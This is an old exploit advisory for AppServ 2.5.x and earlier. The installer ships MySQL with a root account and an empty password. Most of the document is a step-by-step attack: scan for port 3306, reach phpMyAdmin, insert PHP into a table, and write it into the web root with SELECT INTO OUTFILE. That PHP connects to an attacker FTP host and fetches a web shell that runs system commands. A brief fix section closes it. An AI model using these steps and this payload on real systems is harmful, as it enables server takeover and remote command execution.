AppServ 2.5.x and Prior Exploit
what AppServ
==========
AppServ is the Apache/PHP/MySQL open source software installer packages.
Objective : - Easy to buid Webserver and Database Server
- For those who just beginning client/server programming.
- For web programmers/developers using PHP & MySQL.
- For programming techniques that is easily to be ported to other platforms
such as WindowZ
- Single step installation , no need to perform multiple step, time consuming
installation and configuration.
- Ready-to-run just after you've finished installing.ready-to-run just after
you've finished installing.
- If you hate and boring M$ IIS Webserver.
=====================================================
AppServ URL:http://www.appservnetwork.com
Vulnerability Ver: 2.5.X and prior
problem :
=================================
the program comes in default user (Root) and empty password which let attacker
to contrlor program and computer.
=================================
Expliot Method
1)scan tool (SuperScan or whatever)
this step to scan MySQL service on port 3306
2)when we found a serveic (MySQL on 3306) we can Reguest the IP from IE
(Internet Explorer).
>From IE we can request the Machain IP like( http://xxx.xxx.xxx.xxx)
3)if we success the index page for AppServ open
4)Now we can edit the databases and tables in Mysql by phpmyadmin
>From IE (http://xxx.xxx.xxx.xxx/PhpMyAdmin)
5)default MySQL Server come with two database (test,mysql),our target is (mysql
).
Now we can add new table contains our exploit
- Create New table for example (exploit) with one fild and type TEXT
-insert in database the exploit ( PHP code) like :
==============start=================
<?
$conn_id = ftp_connect("Evil_IP_or_Attacker_ip");
$login_result = ftp_login($conn_id, "Attacker", "Passwd");
$download = ftp_get($conn_id, "C:\AppServ\www\phpShell.php", "phpshell.php",
FTP_BINARY);
ftp_quit($conn_id);
?>
==============end=====================
the attacker could use " Windows FTP Server" or any FTP daemon, it's not a
matter :-)
phpshell.php is a script function like (system,passthru,exec ...etc)
you can find nice phpshell here (http://phpfm.sf.net )
the attacker could download EXE file else.
6)Now we are able to make a query to outfile by use INTO OUTFILE statement .
SELECT * From exploit INTO OUTFILE 'C:\\AppServ\\www\\Query.php'
7)Query.php contain Our PHP code
8)if we success we can reguest
(http://xxx.xxx.xxx.xxx/Query.php)
9)if FTP connection successful and downloaded phpshell.php in the victim PC you
can send new request like:
(http://xxx.xxx.xxx.xxx/phpshell.php)
10) Game's Over
==================================================
Fix
=====
1)change Root passowrd
2)use firewall for aptche and MySQL Server
3)use Save Mode for your script
==============================================================
discovered by Saudi Linux